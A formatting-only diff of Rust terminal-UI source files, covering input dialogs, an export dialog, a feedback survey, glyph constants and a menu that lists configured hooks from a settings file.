     pub fn insert_char(&mut self, ch: char) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         field.error = None;
         match &mut field.kind {
             ElicitationFieldKind::Text { .. } | ElicitationFieldKind::Url => {
@@ -256,8 +259,7 @@ impl ElicitationDialogState {
                 let candidate = format!("{}{}", field.value, ch);
                 let lower = candidate.to_lowercase();
                 if let Some((found_v, _)) = options.iter().find(|(val, lbl)| {
-                    lbl.to_lowercase().starts_with(&lower)
-                        || val.to_lowercase().starts_with(&lower)
+                    lbl.to_lowercase().starts_with(&lower) || val.to_lowercase().starts_with(&lower)
                 }) {
                     field.value = found_v.clone();
                 }
@@ -268,7 +270,9 @@ impl ElicitationDialogState {
 
     /// Delete the last character from the active text/url field.
     pub fn backspace(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         match &field.kind {
             ElicitationFieldKind::Text { .. } | ElicitationFieldKind::Url => {
                 field.value.pop();
@@ -279,10 +283,15 @@ impl ElicitationDialogState {
 
     /// For enum fields: cycle to the next option.
     pub fn cycle_enum_next(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         if let ElicitationFieldKind::Enum { options } = &field.kind {
             let options = options.clone();
-            let idx = options.iter().position(|(v, _)| *v == field.value).unwrap_or(0);
+            let idx = options
+                .iter()
+                .position(|(v, _)| *v == field.value)
+                .unwrap_or(0);
             let next = (idx + 1) % options.len();
             field.value = options[next].0.clone();
         }
@@ -290,10 +299,15 @@ impl ElicitationDialogState {
 
     /// For enum fields: cycle to the previous option.
     pub fn cycle_enum_prev(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         if let ElicitationFieldKind::Enum { options } = &field.kind {
             let options = options.clone();
-            let idx = options.iter().position(|(v, _)| *v == field.value).unwrap_or(0);
+            let idx = options
+                .iter()
+                .position(|(v, _)| *v == field.value)
+                .unwrap_or(0);
             let prev = if idx == 0 { options.len() - 1 } else { idx - 1 };
             field.value = options[prev].0.clone();
         }
@@ -301,7 +315,9 @@ impl ElicitationDialogState {
 
     /// For boolean or multi-enum fields: toggle the current selection.
     pub fn toggle_active(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         match &mut field.kind {
             ElicitationFieldKind::Boolean => {
                 field.value = if field.value == "true" {
@@ -323,10 +339,14 @@ impl ElicitationDialogState {
 
     /// For multi-enum fields: move the sub-cursor down.
     pub fn multi_enum_next(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         if let ElicitationFieldKind::MultiEnum { checked, .. } = &field.kind {
             let n = checked.len();
-            if n == 0 { return; }
+            if n == 0 {
+                return;
+            }
             let cur: usize = field.value.parse().unwrap_or(0);
             field.value = ((cur + 1) % n).to_string();
         }
@@ -334,10 +354,14 @@ impl ElicitationDialogState {
 
     /// For multi-enum fields: move the sub-cursor up.
     pub fn multi_enum_prev(&mut self) {
-        let Some(field) = self.fields.get_mut(self.active_field) else { return };
+        let Some(field) = self.fields.get_mut(self.active_field) else {
+            return;
+        };
         if let ElicitationFieldKind::MultiEnum { checked, .. } = &field.kind {
             let n = checked.len();
-            if n == 0 { return; }
+            if n == 0 {
+                return;
+            }
             let cur: usize = field.value.parse().unwrap_or(0);
             field.value = (if cur == 0 { n - 1 } else { cur - 1 }).to_string();
         }
@@ -361,7 +385,12 @@ pub fn render_elicitation_dialog(state: &ElicitationDialogState, area: Rect, buf
     let dialog_w = 64u16.min(area.width.saturating_sub(4));
     let x = area.x + (area.width.saturating_sub(dialog_w)) / 2;
     let y = area.y + (area.height.saturating_sub(dialog_h)) / 2;
-    let dialog_area = Rect { x, y, width: dialog_w, height: dialog_h };
+    let dialog_area = Rect {
+        x,
+        y,
+        width: dialog_w,
+        height: dialog_h,
+    };
 
     Clear.render(dialog_area, buf);
 
@@ -405,7 +434,9 @@ pub fn render_elicitation_dialog(state: &ElicitationDialogState, area: Rect, buf
     for (idx, field) in state.fields.iter().enumerate() {
         let focused = idx == state.active_field;
         let label_style = if focused {
-            Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD)
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD)
         } else {
             Style::default().fg(Color::Gray)
         };
@@ -458,7 +489,11 @@ pub fn render_elicitation_dialog(state: &ElicitationDialogState, area: Rect, buf
     Paragraph::new(visible_lines).render(inner, buf);
 }
 
-fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width: usize) -> Line<'a> {
+fn render_field_value_line<'a>(
+    field: &'a ElicitationField,
+    focused: bool,
+    width: usize,
+) -> Line<'a> {
     let input_bg = if focused {
         Color::Rgb(30, 30, 60)
     } else {
@@ -473,7 +508,11 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
             } else {
                 // Show cursor at end when focused
                 let v = field.value.clone();
-                if focused { format!("{v}_") } else { v }
+                if focused {
+                    format!("{v}_")
+                } else {
+                    v
+                }
             };
             let padded = format!("   {:<width$}", display, width = width.saturating_sub(3));
             Line::from(vec![Span::styled(
@@ -488,7 +527,11 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
                 .find(|(v, _)| *v == field.value)
                 .map(|(_, l)| l.as_str())
                 .unwrap_or(field.value.as_str());
-            let hint = if focused { " ◀ ▶ arrows to change" } else { "" };
+            let hint = if focused {
+                " ◀ ▶ arrows to change"
+            } else {
+                ""
+            };
             Line::from(vec![
                 Span::styled("   ", Style::default()),
                 Span::styled(
@@ -496,7 +539,11 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
                     Style::default()
                         .fg(Color::White)
                         .bg(input_bg)
-                        .add_modifier(if focused { Modifier::BOLD } else { Modifier::empty() }),
+                        .add_modifier(if focused {
+                            Modifier::BOLD
+                        } else {
+                            Modifier::empty()
+                        }),
                 ),
                 Span::styled(hint, Style::default().fg(Color::DarkGray)),
             ])
@@ -509,7 +556,9 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
                 let on_cursor = focused && i == sub_cursor;
                 let check = if is_checked { "[x] " } else { "[ ] " };
                 let style = if on_cursor {
-                    Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD)
+                    Style::default()
+                        .fg(Color::Cyan)
+                        .add_modifier(Modifier::BOLD)
                 } else if is_checked {
                     Style::default().fg(Color::Green)
                 } else {
@@ -525,16 +574,26 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
             let checked = field.value == "true";
             let (yes_style, no_style) = if checked {
                 (
-                    Style::default().fg(Color::Black).bg(Color::Green).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Black)
+                        .bg(Color::Green)
+                        .add_modifier(Modifier::BOLD),
                     Style::default().fg(Color::DarkGray),
                 )
             } else {
                 (
                     Style::default().fg(Color::DarkGray),
-                    Style::default().fg(Color::Black).bg(Color::Red).add_modifier(Modifier::BOLD),
+                    Style::default()
+                        .fg(Color::Black)
+                        .bg(Color::Red)
+                        .add_modifier(Modifier::BOLD),
                 )
             };
-            let hint = if focused { " Space/Enter to toggle" } else { "" };
+            let hint = if focused {
+                " Space/Enter to toggle"
+            } else {
+                ""
+            };
             Line::from(vec![
                 Span::raw("   "),
                 Span::styled(" Yes ", yes_style),
@@ -548,7 +607,9 @@ fn render_field_value_line<'a>(field: &'a ElicitationField, focused: bool, width
 
 /// Simple word-wrap helper for the request message.
 fn wrap_str(s: &str, width: usize) -> Vec<String> {
-    if width == 0 { return vec![s.to_string()]; }
+    if width == 0 {
+        return vec![s.to_string()];
+    }
     let mut lines = Vec::new();
     let mut current = String::new();
     for word in s.split_whitespace() {
@@ -562,7 +623,9 @@ fn wrap_str(s: &str, width: usize) -> Vec<String> {
             current = word.to_string();
         }
     }
-    if !current.is_empty() { lines.push(current); }
+    if !current.is_empty() {
+        lines.push(current);
+    }
     lines
 }
 
@@ -766,20 +829,40 @@ mod tests {
     #[test]
     fn elicitation_render_smoke() {
         let s = make_dialog();
-        let area = Rect { x: 0, y: 0, width: 100, height: 30 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 100,
+            height: 30,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_elicitation_dialog(&s, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(rendered.contains("test-server") || rendered.contains("Input Required"));
     }
 
     #[test]
     fn elicitation_not_rendered_when_invisible() {
         let s = ElicitationDialogState::new();
-        let area = Rect { x: 0, y: 0, width: 100, height: 30 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 100,
+            height: 30,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_elicitation_dialog(&s, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(!rendered.contains("Input Required"));
     }
 

--- a/src-rust/crates/tui/src/export_dialog.rs
+++ b/src-rust/crates/tui/src/export_dialog.rs
@@ -9,8 +9,8 @@ use ratatui::widgets::{Paragraph, Wrap};
 use ratatui::Frame;
 
 use crate::overlays::{
-    begin_modal_frame, modal_header_line_area, render_modal_title_frame, CLAURST_ACCENT, CLAURST_MUTED,
-    CLAURST_PANEL_BG, CLAURST_TEXT,
+    begin_modal_frame, modal_header_line_area, render_modal_title_frame, CLAURST_ACCENT,
+    CLAURST_MUTED, CLAURST_PANEL_BG, CLAURST_TEXT,
 };
 
 // ---------------------------------------------------------------------------
@@ -106,7 +106,9 @@ pub fn render_export_dialog(frame: &mut Frame, state: &ExportDialogState, area: 
     frame.render_widget(
         Paragraph::new(Line::from(vec![Span::styled(
             " tab/←/→ switch  ·  enter export  ·  1/2 choose",
-            Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(CLAURST_MUTED)
+                .add_modifier(Modifier::ITALIC),
         )])),
         layout.footer_area,
     );
@@ -119,12 +121,23 @@ fn export_option_row(
     selected: bool,
     width: u16,
 ) -> Line<'static> {
-    let bg = if selected { CLAURST_ACCENT } else { CLAURST_PANEL_BG };
+    let bg = if selected {
+        CLAURST_ACCENT
+    } else {
+        CLAURST_PANEL_BG
+    };
     let fg = if selected { Color::White } else { CLAURST_TEXT };
-    let desc_fg = if selected { Color::Rgb(245, 220, 232) } else { CLAURST_MUTED };
+    let desc_fg = if selected {
+        Color::Rgb(245, 220, 232)
+    } else {
+        CLAURST_MUTED
+    };
     let mut spans = vec![
         Span::styled(format!(" [{}] ", key), Style::default().fg(desc_fg).bg(bg)),
-        Span::styled(label.to_string(), Style::default().fg(fg).bg(bg).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            label.to_string(),
+            Style::default().fg(fg).bg(bg).add_modifier(Modifier::BOLD),
+        ),
         Span::styled(
             format!("  {}", description),
             Style::default().fg(desc_fg).bg(bg),
@@ -225,10 +238,17 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 30)).unwrap();
         let mut state = ExportDialogState::new();
         state.open();
-        terminal.draw(|frame| {
-            render_export_dialog(frame, &state, frame.area());
-        }).unwrap();
-        let content: String = terminal.backend().buffer().clone().content().iter()
+        terminal
+            .draw(|frame| {
+                render_export_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
+        let content: String = terminal
+            .backend()
+            .buffer()
+            .clone()
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("Export") || content.contains("JSON"));
@@ -239,9 +259,11 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(80, 24)).unwrap();
         let state = ExportDialogState::new();
         let before = terminal.backend().buffer().clone();
-        terminal.draw(|frame| {
-            render_export_dialog(frame, &state, frame.area());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_export_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
         assert_eq!(terminal.backend().buffer().content(), before.content());
     }
 }

--- a/src-rust/crates/tui/src/feedback_survey.rs
+++ b/src-rust/crates/tui/src/feedback_survey.rs
@@ -121,11 +121,7 @@ impl Default for FeedbackSurveyState {
 // ---------------------------------------------------------------------------
 
 /// Render the feedback survey as a centered floating dialog.
-pub fn render_feedback_survey(
-    state: &FeedbackSurveyState,
-    area: Rect,
-    buf: &mut Buffer,
-) {
+pub fn render_feedback_survey(state: &FeedbackSurveyState, area: Rect, buf: &mut Buffer) {
     if !state.visible {
         return;
     }
@@ -153,13 +149,31 @@ pub fn render_feedback_survey(
                 Line::from(""),
                 Line::from(vec![
                     Span::raw("  "),
-                    Span::styled("1", Style::default().fg(Color::Red).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "1",
+                        Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Bad   "),
-                    Span::styled("2", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "2",
+                        Style::default()
+                            .fg(Color::Yellow)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Fine   "),
-                    Span::styled("3", Style::default().fg(Color::Green).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "3",
+                        Style::default()
+                            .fg(Color::Green)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Good   "),
-                    Span::styled("0", Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "0",
+                        Style::default()
+                            .fg(Color::DarkGray)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Dismiss"),
                 ]),
             ],
@@ -175,11 +189,24 @@ pub fn render_feedback_survey(
                 Line::from(""),
                 Line::from(vec![
                     Span::raw("  "),
-                    Span::styled("1", Style::default().fg(Color::Green).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "1",
+                        Style::default()
+                            .fg(Color::Green)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Yes   "),
-                    Span::styled("2", Style::default().fg(Color::Red).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "2",
+                        Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" No   "),
-                    Span::styled("3", Style::default().fg(Color::DarkGray).add_modifier(Modifier::BOLD)),
+                    Span::styled(
+                        "3",
+                        Style::default()
+                            .fg(Color::DarkGray)
+                            .add_modifier(Modifier::BOLD),
+                    ),
                     Span::raw(" Don't ask again"),
                 ]),
             ],

--- a/src-rust/crates/tui/src/figures.rs
+++ b/src-rust/crates/tui/src/figures.rs
@@ -2,28 +2,32 @@
 
 // Platform-aware: on Windows use ● (U+25CF), elsewhere ⏺ (U+23FA)
 pub fn black_circle() -> &'static str {
-    if cfg!(target_os = "windows") { "●" } else { "⏺" }
+    if cfg!(target_os = "windows") {
+        "●"
+    } else {
+        "⏺"
+    }
 }
-pub const BULLET_OPERATOR: &str = "∙";       // U+2219
-pub const TEARDROP_ASTERISK: &str = "✻";     // U+273B - used for thinking/compact
-pub const UP_ARROW: &str = "↑";              // U+2191
-pub const DOWN_ARROW: &str = "↓";            // U+2193
-pub const LIGHTNING_BOLT: &str = "↯";        // U+21AF - fast mode
-pub const EFFORT_LOW: &str = "○";            // U+25CB
-pub const EFFORT_MEDIUM: &str = "◐";         // U+25D0
-pub const EFFORT_HIGH: &str = "●";           // U+25CF
-pub const EFFORT_MAX: &str = "◉";            // U+25C9
-pub const PLAY_ICON: &str = "▶";             // U+25B6
-pub const PAUSE_ICON: &str = "⏸";            // U+23F8
-pub const REFRESH_ARROW: &str = "↻";         // U+21BB
-pub const FORK_GLYPH: &str = "⑂";            // U+2442
-pub const DIAMOND_OPEN: &str = "◇";          // U+25C7 - running/pending review
-pub const DIAMOND_FILLED: &str = "◆";        // U+25C6 - completed review
-pub const REFERENCE_MARK: &str = "※";        // U+203B - away summary marker
-pub const FLAG_ICON: &str = "⚑";             // U+2691
-pub const BLOCKQUOTE_BAR: &str = "▎";        // U+258E - blockquote left bar
-pub const HEAVY_HORIZONTAL: &str = "━";      // U+2501
-pub const THEREFORE: &str = "∴";             // U+2234 - alternative thinking symbol
+pub const BULLET_OPERATOR: &str = "∙"; // U+2219
+pub const TEARDROP_ASTERISK: &str = "✻"; // U+273B - used for thinking/compact
+pub const UP_ARROW: &str = "↑"; // U+2191
+pub const DOWN_ARROW: &str = "↓"; // U+2193
+pub const LIGHTNING_BOLT: &str = "↯"; // U+21AF - fast mode
+pub const EFFORT_LOW: &str = "○"; // U+25CB
+pub const EFFORT_MEDIUM: &str = "◐"; // U+25D0
+pub const EFFORT_HIGH: &str = "●"; // U+25CF
+pub const EFFORT_MAX: &str = "◉"; // U+25C9
+pub const PLAY_ICON: &str = "▶"; // U+25B6
+pub const PAUSE_ICON: &str = "⏸"; // U+23F8
+pub const REFRESH_ARROW: &str = "↻"; // U+21BB
+pub const FORK_GLYPH: &str = "⑂"; // U+2442
+pub const DIAMOND_OPEN: &str = "◇"; // U+25C7 - running/pending review
+pub const DIAMOND_FILLED: &str = "◆"; // U+25C6 - completed review
+pub const REFERENCE_MARK: &str = "※"; // U+203B - away summary marker
+pub const FLAG_ICON: &str = "⚑"; // U+2691
+pub const BLOCKQUOTE_BAR: &str = "▎"; // U+258E - blockquote left bar
+pub const HEAVY_HORIZONTAL: &str = "━"; // U+2501
+pub const THEREFORE: &str = "∴"; // U+2234 - alternative thinking symbol
 pub const NEW_MESSAGES_DOWN: &str = "↓";
 pub const BRIDGE_READY: &str = "· ✔ ·";
 pub const BRIDGE_FAILED: &str = "×";

--- a/src-rust/crates/tui/src/hooks_config_menu.rs
+++ b/src-rust/crates/tui/src/hooks_config_menu.rs
@@ -16,8 +16,8 @@ use ratatui::text::{Line, Span};
 use ratatui::widgets::{Paragraph, Widget, Wrap};
 
 use crate::overlays::{
-    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT,
-    CLAURST_MUTED, CLAURST_PANEL_BG, CLAURST_TEXT,
+    begin_modal_buf, modal_header_line_area, render_modal_title_buf, CLAURST_ACCENT, CLAURST_MUTED,
+    CLAURST_PANEL_BG, CLAURST_TEXT,
 };
 
 // ---------------------------------------------------------------------------
@@ -45,11 +45,11 @@ impl HookEntry {
     /// Short one-line description of the hook shown in the list view.
     pub fn summary(&self) -> String {
         let prefix = match self.hook_type.as_str() {
-            "command" => "\u{f120}",  // nerd-font terminal icon, falls back to plain
-            "prompt"  => "\u{f075}",
-            "agent"   => "\u{f013}",
-            "http"    => "\u{f0c1}",
-            _         => "\u{2022}",
+            "command" => "\u{f120}", // nerd-font terminal icon, falls back to plain
+            "prompt" => "\u{f075}",
+            "agent" => "\u{f013}",
+            "http" => "\u{f0c1}",
+            _ => "\u{2022}",
         };
         format!("{} {}", prefix, self.target)
     }
@@ -158,10 +158,14 @@ impl HooksConfigMenuState {
     /// Navigate back one level (Esc key).
     pub fn back(&mut self) {
         match self.mode {
-            HooksMenuMode::SelectEvent => { self.close(); }
+            HooksMenuMode::SelectEvent => {
+                self.close();
+            }
             HooksMenuMode::SelectMatcher => {
                 self.mode = HooksMenuMode::SelectEvent;
-                self.selected = self.events.iter()
+                self.selected = self
+                    .events
+                    .iter()
                     .position(|e| Some(e) == self.selected_event.as_ref())
                     .unwrap_or(0);
                 self.selected_event = None;
@@ -170,7 +174,8 @@ impl HooksConfigMenuState {
             HooksMenuMode::SelectHook => {
                 self.mode = HooksMenuMode::SelectMatcher;
                 let matchers = self.matchers_for_event();
-                self.selected = matchers.iter()
+                self.selected = matchers
+                    .iter()
                     .position(|m| Some(m) == self.selected_matcher.as_ref())
                     .unwrap_or(0);
                 self.selected_matcher = None;
@@ -202,10 +207,10 @@ impl HooksConfigMenuState {
 
     pub fn select_next(&mut self) {
         let count = match self.mode {
-            HooksMenuMode::SelectEvent   => self.events.len(),
+            HooksMenuMode::SelectEvent => self.events.len(),
             HooksMenuMode::SelectMatcher => self.matchers_for_event().len(),
-            HooksMenuMode::SelectHook    => self.hooks_for_selection().len(),
-            HooksMenuMode::ViewHook      => 0,
+            HooksMenuMode::SelectHook => self.hooks_for_selection().len(),
+            HooksMenuMode::ViewHook => 0,
         };
         if count == 0 {
             return;
@@ -233,9 +238,18 @@ impl HooksConfigMenuState {
             }
         }
         // Canonical order for well-known events
-        let order = ["PreToolUse", "PostToolUse", "PreSession", "PostSession", "Stop"];
+        let order = [
+            "PreToolUse",
+            "PostToolUse",
+            "PreSession",
+            "PostSession",
+            "Stop",
+        ];
         seen.sort_by_key(|e| {
-            order.iter().position(|o| *o == e.as_str()).unwrap_or(usize::MAX)
+            order
+                .iter()
+                .position(|o| *o == e.as_str())
+                .unwrap_or(usize::MAX)
         });
         self.events = seen;
     }
@@ -243,7 +257,7 @@ impl HooksConfigMenuState {
     fn matchers_for_event(&self) -> Vec<String> {
         let ev = match &self.selected_event {
             Some(e) => e.as_str(),
-            None    => return Vec::new(),
+            None => return Vec::new(),
         };
         let mut seen: Vec<String> = Vec::new();
         for h in &self.hooks {
@@ -257,7 +271,10 @@ impl HooksConfigMenuState {
     fn hooks_for_selection(&self) -> Vec<&HookEntry> {
         let ev = self.selected_event.as_deref().unwrap_or("");
         let mt = self.selected_matcher.as_deref().unwrap_or("");
-        self.hooks.iter().filter(|h| h.event == ev && h.matcher == mt).collect()
+        self.hooks
+            .iter()
+            .filter(|h| h.event == ev && h.matcher == mt)
+            .collect()
     }
 
     fn hook_count_for_event(&self, event: &str) -> usize {
@@ -265,17 +282,20 @@ impl HooksConfigMenuState {
     }
 
     fn hook_count_for_matcher(&self, event: &str, matcher: &str) -> usize {
-        self.hooks.iter().filter(|h| h.event == event && h.matcher == matcher).count()
+        self.hooks
+            .iter()
+            .filter(|h| h.event == event && h.matcher == matcher)
+            .count()
     }
 
     fn load_hooks(&mut self) {
         let settings_path = claurst_core::config::Settings::config_dir().join("settings.json");
         let json_str = match std::fs::read_to_string(&settings_path) {
-            Ok(s)  => s,
+            Ok(s) => s,
             Err(_) => return,
         };
         let root: serde_json::Value = match serde_json::from_str(&json_str) {
-            Ok(v)  => v,
+            Ok(v) => v,
             Err(_) => return,
         };
 
@@ -289,13 +309,13 @@ impl HooksConfigMenuState {
         // }
         let hooks_map = match root.get("hooks").and_then(|h| h.as_object()) {
             Some(m) => m,
-            None    => return,
+            None => return,
         };
 
         for (event_name, event_val) in hooks_map {
             let entries = match event_val.as_array() {
                 Some(a) => a,
-                None    => continue,
+                None => continue,
             };
             for entry in entries {
                 let matcher = entry
@@ -307,15 +327,36 @@ impl HooksConfigMenuState {
                 if let Some(hook_list) = entry.get("hooks").and_then(|h| h.as_array()) {
                     for hook in hook_list {
                         let hook_type = hook
-                            .get("type").and_then(|v| v.as_str())
+                            .get("type")
+                            .and_then(|v| v.as_str())
                             .unwrap_or("command")
                             .to_string();
                         let target = match hook_type.as_str() {
-                            "command" => hook.get("command").and_then(|v| v.as_str()).unwrap_or("").to_string(),
-                            "prompt"  => hook.get("prompt").and_then(|v| v.as_str()).unwrap_or("").to_string(),
-                            "agent"   => hook.get("agent").and_then(|v| v.as_str()).unwrap_or("").to_string(),
-                            "http"    => hook.get("url").and_then(|v| v.as_str()).unwrap_or("").to_string(),
-                            _         => hook.get("command").and_then(|v| v.as_str()).unwrap_or("").to_string(),
+                            "command" => hook
+                                .get("command")
+                                .and_then(|v| v.as_str())
+                                .unwrap_or("")
+                                .to_string(),
+                            "prompt" => hook
+                                .get("prompt")
+                                .and_then(|v| v.as_str())
+                                .unwrap_or("")
+                                .to_string(),
+                            "agent" => hook
+                                .get("agent")
+                                .and_then(|v| v.as_str())
+                                .unwrap_or("")
+                                .to_string(),
+                            "http" => hook
+                                .get("url")
+                                .and_then(|v| v.as_str())
+                                .unwrap_or("")
+                                .to_string(),
+                            _ => hook
+                                .get("command")
+                                .and_then(|v| v.as_str())
+                                .unwrap_or("")
+                                .to_string(),
                         };
                         if !target.is_empty() {
                             self.hooks.push(HookEntry {
@@ -333,36 +374,35 @@ impl HooksConfigMenuState {
 }
 
 impl Default for HooksConfigMenuState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
 // Rendering
 // ---------------------------------------------------------------------------
 
-pub fn render_hooks_config_menu(
-    state: &HooksConfigMenuState,
-    area: Rect,
-    buf: &mut Buffer,
-) {
-    if !state.visible { return; }
+pub fn render_hooks_config_menu(state: &HooksConfigMenuState, area: Rect, buf: &mut Buffer) {
+    if !state.visible {
+        return;
+    }
 
     let layout = begin_modal_buf(buf, area, 80, 28, 2, 1);
     let inner_h = layout.body_area.height as usize;
 
     let (title, lines) = match state.mode {
-        HooksMenuMode::SelectEvent   => render_event_list(state),
+        HooksMenuMode::SelectEvent => render_event_list(state),
         HooksMenuMode::SelectMatcher => render_matcher_list(state),
-        HooksMenuMode::SelectHook    => render_hook_list(state),
-        HooksMenuMode::ViewHook      => render_hook_detail(state),
+        HooksMenuMode::SelectHook => render_hook_list(state),
+        HooksMenuMode::ViewHook => render_hook_detail(state),
     };
     render_modal_title_buf(buf, layout.header_area, title.trim(), "esc");
     let breadcrumb = match state.mode {
         HooksMenuMode::SelectEvent => " Review configured hook events and matchers.".to_string(),
-        HooksMenuMode::SelectMatcher => format!(
-            " Event: {}",
-            state.selected_event.as_deref().unwrap_or("?")
-        ),
+        HooksMenuMode::SelectMatcher => {
+            format!(" Event: {}", state.selected_event.as_deref().unwrap_or("?"))
+        }
         HooksMenuMode::SelectHook => format!(
             " {} / {}",
             state.selected_event.as_deref().unwrap_or("?"),
@@ -395,7 +435,9 @@ pub fn render_hooks_config_menu(
     };
     Paragraph::new(Line::from(vec![Span::styled(
         footer,
-        Style::default().fg(CLAURST_MUTED).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(CLAURST_MUTED)
+            .add_modifier(Modifier::ITALIC),
     )]))
     .render(layout.footer_area, buf);
 }
@@ -419,7 +461,12 @@ fn render_event_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'s
         for (i, event) in state.events.iter().enumerate() {
             let selected = i == state.selected;
             let count = state.hook_count_for_event(event);
-            push_list_row(&mut lines, event, &format!("{count} hook{}", if count == 1 { "" } else { "s" }), selected);
+            push_list_row(
+                &mut lines,
+                event,
+                &format!("{count} hook{}", if count == 1 { "" } else { "s" }),
+                selected,
+            );
         }
     }
 
@@ -435,7 +482,12 @@ fn render_matcher_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<
     lines.push(Line::from(""));
     lines.push(Line::from(vec![
         Span::styled("  Event: ", Style::default().fg(Color::DarkGray)),
-        Span::styled(event.to_string(), Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            event.to_string(),
+            Style::default()
+                .fg(Color::Cyan)
+                .add_modifier(Modifier::BOLD),
+        ),
     ]));
     lines.push(Line::from(""));
 
@@ -443,7 +495,12 @@ fn render_matcher_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<
     for (i, matcher) in matchers.iter().enumerate() {
         let selected = i == state.selected;
         let count = state.hook_count_for_matcher(event, matcher);
-        push_list_row(&mut lines, matcher, &format!("{count} hook{}", if count == 1 { "" } else { "s" }), selected);
+        push_list_row(
+            &mut lines,
+            matcher,
+            &format!("{count} hook{}", if count == 1 { "" } else { "s" }),
+            selected,
+        );
     }
 
     (" Hooks — Select Matcher ", lines)
@@ -453,7 +510,7 @@ fn render_matcher_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<
 
 fn render_hook_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'static>>) {
     let mut lines: Vec<Line<'static>> = Vec::new();
-    let event   = state.selected_event.as_deref().unwrap_or("?");
+    let event = state.selected_event.as_deref().unwrap_or("?");
     let matcher = state.selected_matcher.as_deref().unwrap_or("?");
 
     lines.push(Line::from(""));
@@ -461,7 +518,12 @@ fn render_hook_list(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'st
         Span::styled("  ", Style::default()),
         Span::styled(event.to_string(), Style::default().fg(Color::Cyan)),
         Span::styled(" / ", Style::default().fg(Color::DarkGray)),
-        Span::styled(matcher.to_string(), Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            matcher.to_string(),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
+        ),
     ]));
     lines.push(Line::from(""));
 
@@ -482,23 +544,32 @@ fn render_hook_detail(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'
     let hooks = state.hooks_for_selection();
     let hook = match hooks.get(state.selected) {
         Some(h) => h,
-        None    => {
-            lines.push(Line::from(vec![Span::styled("  Hook not found.", Style::default().fg(Color::Red))]));
+        None => {
+            lines.push(Line::from(vec![Span::styled(
+                "  Hook not found.",
+                Style::default().fg(Color::Red),
+            )]));
             return (" Hook Detail ", lines);
         }
     };
 
     lines.push(Line::from(""));
-    push_detail_row(&mut lines, "Event",   &hook.event);
+    push_detail_row(&mut lines, "Event", &hook.event);
     push_detail_row(&mut lines, "Matcher", &hook.matcher);
